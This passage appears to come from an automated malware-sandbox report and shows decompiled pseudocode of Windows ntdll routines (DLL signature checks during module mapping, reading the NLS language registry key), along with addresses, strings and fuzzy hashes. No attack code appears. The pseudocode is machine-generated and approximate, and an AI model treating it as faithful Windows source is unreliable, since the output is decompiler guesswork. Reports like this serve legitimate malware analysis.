                                                                              • Instruction Fuzzy Hash: F7911771A0021ADFEF29DF9DD8809BAF7B9FF45314B054169EA05AB245D730EE01CB92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01747E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 98%
                                                                              			E01747E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0174CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0173C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1825780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E017B5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1825780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01757D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01757D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E017B7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01757D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01757D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E017B7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0176A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0173B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                                              0x01747e4c
                                                                              0x01747e50
                                                                              0x01747e55
                                                                              0x01747e58
                                                                              0x01747e5d
                                                                              0x01747e71
                                                                              0x01747f33
                                                                              0x01747e77
                                                                              0x01747e77
                                                                              0x01747e79
                                                                              0x01747e79
                                                                              0x01747e7e
                                                                              0x01747f45
                                                                              0x01799848
                                                                              0x00000000
                                                                              0x01799848
                                                                              0x01747f4e
                                                                              0x01747f53
                                                                              0x01747f5a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0179985a
                                                                              0x01799862
                                                                              0x01799866
                                                                              0x00000000
                                                                              0x0179986c
                                                                              0x00000000
                                                                              0x0179986c
                                                                              0x01747e84
                                                                              0x01747e84
                                                                              0x01747e8d
                                                                              0x01799871
                                                                              0x01747eb8
                                                                              0x01747ec0
                                                                              0x01747ec0
                                                                              0x01747e9a
                                                                              0x0179987e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01799884
                                                                              0x0179988b
                                                                              0x017998a7
                                                                              0x017998ac
                                                                              0x017998b1
                                                                              0x017998b6
                                                                              0x017998b8
                                                                              0x017998b8
                                                                              0x017998b9
                                                                              0x00000000
                                                                              0x017998b9
                                                                              0x01747ea0
                                                                              0x01747ea7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01747eac
                                                                              0x01747eb1
                                                                              0x01747ec6
                                                                              0x01747ed0
                                                                              0x017998cc
                                                                              0x01747ed6
                                                                              0x01747ed6
                                                                              0x01747ed6
                                                                              0x01747ede
                                                                              0x01747ee3
                                                                              0x017998e3
                                                                              0x017998f0
                                                                              0x01799902
                                                                              0x017998f2
                                                                              0x017998fb
                                                                              0x017998fb
                                                                              0x01799907
                                                                              0x0179991d
                                                                              0x0179991d
                                                                              0x01799907
                                                                              0x017998e3
                                                                              0x01747ef0
                                                                              0x01747f14
                                                                              0x01747f14
                                                                              0x01747f1e
                                                                              0x01799946
                                                                              0x01747f24
                                                                              0x01747f24
                                                                              0x01747f24
                                                                              0x01747f2c
                                                                              0x0179996a
                                                                              0x01799975
                                                                              0x01799975
                                                                              0x0179997e
                                                                              0x01799993
                                                                              0x01799993
                                                                              0x0179997e
                                                                              0x00000000
                                                                              0x01747ef2
                                                                              0x01747efc
                                                                              0x01747f0a
                                                                              0x01747f0e
                                                                              0x01799933
                                                                              0x00000000
                                                                              0x01799933
                                                                              0x00000000
                                                                              0x01747f0e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01747eb1

                                                                              Strings
                                                                              • minkernel\ntdll\ldrmap.c, xrefs: 017998A2
                                                                              • Could not validate the crypto signature for DLL %wZ, xrefs: 01799891
                                                                              • LdrpCompleteMapModule, xrefs: 01799898
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                              • API String ID: 0-1676968949
                                                                              • Opcode ID: 45988d96e78120fda15e52932e13ccaa5cee8d6b55984b256204a8a559ef48ee
                                                                              • Instruction ID: d6eb9ba34fec9a99016bf9d9874609c7bce81d4c8cf3171309d0c1f74906b6fe
                                                                              • Opcode Fuzzy Hash: 45988d96e78120fda15e52932e13ccaa5cee8d6b55984b256204a8a559ef48ee
                                                                              • Instruction Fuzzy Hash: 8951F031600742DFEB3ACB6CC984B6AFBE4AB48314F040699EA519B7D1D770ED01CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0173E620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 93%
                                                                              			E0173E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0173F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E017795D0();
						}
						if(_t78 != 0) {
							L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0177FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0177BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01779600();
					if(_t97 < 0) {
						goto L6;
					}
					E0177BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0173F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0177BB40(_t83, _t102 + 0x24, _t78);
								if(L017443C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0177BB40(_t84, _t102 + 0x24, _t94);
									if(L017443C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                                              0x0173e620
                                                                              0x0173e628
                                                                              0x0173e62f
                                                                              0x0173e631
                                                                              0x0173e635
                                                                              0x0173e637
                                                                              0x0173e63e
                                                                              0x01795503
                                                                              0x01795503
                                                                              0x0173e64c
                                                                              0x0173e64c
                                                                              0x0173e651
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0173e661
                                                                              0x0173e665
                                                                              0x0179542a
                                                                              0x0173e715
                                                                              0x0173e71a
                                                                              0x0173e71c
                                                                              0x0173e720
                                                                              0x0173e720
                                                                              0x0173e727
                                                                              0x0173e736
                                                                              0x0173e736
                                                                              0x0173e743
                                                                              0x0173e743
                                                                              0x0173e673
                                                                              0x0173e678
                                                                              0x0173e67d
                                                                              0x0173e682
                                                                              0x0173e685
                                                                              0x0173e692
                                                                              0x0173e69b
                                                                              0x0173e6a3
                                                                              0x0173e6ad
                                                                              0x0173e6b1
                                                                              0x0173e6b2
                                                                              0x0173e6bb
                                                                              0x0173e6bf
                                                                              0x0173e6c0
                                                                              0x0173e6c8
                                                                              0x0173e6cc
                                                                              0x0173e6d5
                                                                              0x0173e6d9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0173e6e5
                                                                              0x0173e6ea
                                                                              0x0173e6f9
                                                                              0x0173e70b
                                                                              0x0173e70f
                                                                              0x01795439
                                                                              0x0179545e
                                                                              0x0179545e
                                                                              0x00000000
                                                                              0x0179545e
                                                                              0x0179543b
                                                                              0x0179543e
                                                                              0x01795440
                                                                              0x01795445
                                                                              0x01795472
                                                                              0x01795475
                                                                              0x0179548d
                                                                              0x01795493
                                                                              0x017954a9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017954ab
                                                                              0x017954b4
                                                                              0x017954bc
                                                                              0x017954c8
                                                                              0x017954de
                                                                              0x017954fb
                                                                              0x017954e0
                                                                              0x017954e6
                                                                              0x017954eb
                                                                              0x017954eb
                                                                              0x017954de
                                                                              0x00000000
                                                                              0x017954bc
                                                                              0x01795477
                                                                              0x0179547a
                                                                              0x01795480
                                                                              0x01795483
                                                                              0x01795486
                                                                              0x0179548b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0179548b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01795447
                                                                              0x01795447
                                                                              0x01795447
                                                                              0x01795447
                                                                              0x0179544e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01795450
                                                                              0x01795452
                                                                              0x01795455
                                                                              0x0179545a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0179545c
                                                                              0x0179546a
                                                                              0x0179546d
                                                                              0x0179546f
                                                                              0x00000000
                                                                              0x0179546f
                                                                              0x0173e70f

                                                                              Strings
                                                                              • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0173E68C
                                                                              • @, xrefs: 0173E6C0
                                                                              • InstallLanguageFallback, xrefs: 0173E6DB
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                              • API String ID: 0-1757540487
                                                                              • Opcode ID: 5418c3fdc1c0fabba01ad9d8fa468504d11fa46b422536de9d98f372d5966bd1
                                                                              • Instruction ID: ac74e9e49e8f8a8f5132b83b451f0a2a282221485ac2ecaddbb54d9a812e6d4d
                                                                              • Opcode Fuzzy Hash: 5418c3fdc1c0fabba01ad9d8fa468504d11fa46b422536de9d98f372d5966bd1
                                                                              • Instruction Fuzzy Hash: A451E3B25043169BDB12DF28D444A6BF7E8BF88754F04092EFA85E7251FB34D908C7A2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017FE539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 60%
                                                                              			E017FE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E017FBBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E017FBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E017FAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E01779730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E017FA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E017FA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E01779730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E017FA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E017FA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E01752280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0174B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0174FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E01757D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E017EFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                                              0x017fe547
                                                                              0x017fe549
                                                                              0x017fe54f
                                                                              0x017fe553
                                                                              0x017fe557
                                                                              0x017fe55a
                                                                              0x017fe55c
                                                                              0x017fe55f
                                                                              0x017fe561
                                                                              0x017fe567
                                                                              0x017fe56b
                                                                              0x017fe7e2
                                                                              0x00000000
                                                                              0x017fe571
                                                                              0x017fe575
                                                                              0x017fe577
                                                                              0x017fe57b
                                                                              0x017fe57c
                                                                              0x017fe57d
                                                                              0x017fe57e
                                                                              0x017fe57f
                                                                              0x017fe588
                                                                              0x017fe58f
                                                                              0x017fe591
                                                                              0x017fe592
                                                                              0x017fe592
                                                                              0x017fe596
                                                                              0x017fe59e
                                                                              0x017fe5a0
                                                                              0x017fe5a6
                                                                              0x017fe61d
                                                                              0x017fe61d
                                                                              0x017fe621
                                                                              0x017fe623
                                                                              0x017fe630
                                                                              0x017fe630
                                                                              0x017fe7e6
                                                                              0x017fe7eb
                                                                              0x017fe7ed
                                                                              0x017fe7f4
                                                                              0x017fe7fa
                                                                              0x017fe7ff
                                                                              0x017fe7ff
                                                                              0x017fe80a
                                                                              0x017fe812
                                                                              0x017fe812
                                                                              0x017fe5ab
                                                                              0x017fe5b4
                                                                              0x017fe5b9
                                                                              0x017fe5be
                                                                              0x017fe5c0
                                                                              0x017fe5c2
                                                                              0x017fe5c8
                                                                              0x017fe5c9
                                                                              0x017fe5cb
                                                                              0x017fe5cc
                                                                              0x017fe5d5
                                                                              0x017fe5e4
                                                                              0x017fe5f1
                                                                              0x017fe5f8
                                                                              0x017fe5f8
                                                                              0x017fe5d5
                                                                              0x017fe602
                                                                              0x017fe616
                                                                              0x017fe63d
                                                                              0x017fe644
                                                                              0x017fe64d
                                                                              0x017fe652
                                                                              0x017fe657
                                                                              0x017fe659
                                                                              0x017fe65b
                                                                              0x017fe661
                                                                              0x017fe662
                                                                              0x017fe664
                                                                              0x017fe665
                                                                              0x017fe66e
                                                                              0x017fe67d
                                                                              0x017fe68a
                                                                              0x017fe691
                                                                              0x017fe691
                                                                              0x017fe66e
                                                                              0x017fe6b0
                                                                              0x00000000
                                                                              0x017fe6b6
                                                                              0x017fe6bd
                                                                              0x017fe6c7
                                                                              0x017fe6d7
                                                                              0x017fe6d9
                                                                              0x017fe6db
                                                                              0x017fe6de
                                                                              0x017fe6e3
                                                                              0x017fe6f3
                                                                              0x017fe6fc
                                                                              0x017fe700
                                                                              0x017fe700
                                                                              0x017fe704
                                                                              0x017fe70a
                                                                              0x017fe70a
                                                                              0x017fe713
                                                                              0x017fe716
                                                                              0x017fe719
                                                                              0x017fe720
                                                                              0x017fe761
                                                                              0x017fe76b
                                                                              0x017fe774
                                                                              0x017fe77a
                                                                              0x017fe77a
                                                                              0x017fe78a
                                                                              0x017fe791
                                                                              0x017fe799
                                                                              0x017fe79b
                                                                              0x017fe79f
                                                                              0x017fe7aa
                                                                              0x017fe7c0
                                                                              0x017fe7ac
                                                                              0x017fe7b2
                                                                              0x017fe7b9
                                                                              0x017fe7b9
                                                                              0x017fe7c7
                                                                              0x017fe806
                                                                              0x00000000
                                                                              0x017fe7c9
                                                                              0x017fe7d1
                                                                              0x017fe7d8
                                                                              0x00000000
                                                                              0x017fe7d8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017fe722
                                                                              0x017fe72e
                                                                              0x017fe748
                                                                              0x017fe74c
                                                                              0x017fe754
                                                                              0x017fe756
                                                                              0x017fe75c
                                                                              0x017fe75c
                                                                              0x00000000
                                                                              0x017fe75c
                                                                              0x017fe758
                                                                              0x017fe758
                                                                              0x00000000
                                                                              0x017fe758
                                                                              0x017fe750
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017fe752
                                                                              0x00000000
                                                                              0x017fe752
                                                                              0x017fe730
                                                                              0x017fe735
                                                                              0x017fe73d
                                                                              0x017fe73f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017fe741
                                                                              0x017fe741
                                                                              0x00000000
                                                                              0x017fe741
                                                                              0x017fe739
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017fe73b
                                                                              0x00000000
                                                                              0x017fe73b
                                                                              0x017fe722
                                                                              0x017fe720
                                                                              0x017fe6b0
                                                                              0x017fe618
                                                                              0x00000000
                                                                              0x017fe618

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: `$`
                                                                              • API String ID: 0-197956300
                                                                              • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                              • Instruction ID: 0740cdbb995cab34f0e53a99819eeef9d8d997156b215ec6b14116439eff0f5d
                                                                              • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                              • Instruction Fuzzy Hash: 0B915E312043429BE725CE29C845B1BFBE5AF84714F15892DF795CB394EB74E904CB62
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017B51BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 77%
                                                                              			E017B51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x18105f0);
				E0178D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0174EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E017B53CA(0);
						return E0178D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0177F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01753690(1, _t117, 0x1711810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0177AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01754620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0177AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
